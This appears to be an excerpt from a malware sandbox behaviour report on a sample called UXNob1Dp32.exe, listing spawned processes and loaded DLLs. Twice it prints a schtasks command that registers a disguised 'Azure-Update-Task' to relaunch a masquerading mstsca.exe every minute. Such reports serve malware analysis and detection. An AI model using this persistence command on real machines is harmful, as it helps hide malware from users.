Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe"
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe" --AutoStart
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Process created: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe "C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe"
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Process created: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe "C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\UXNob1Dp32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: davhlpr.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: browcli.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: srvcli.dll
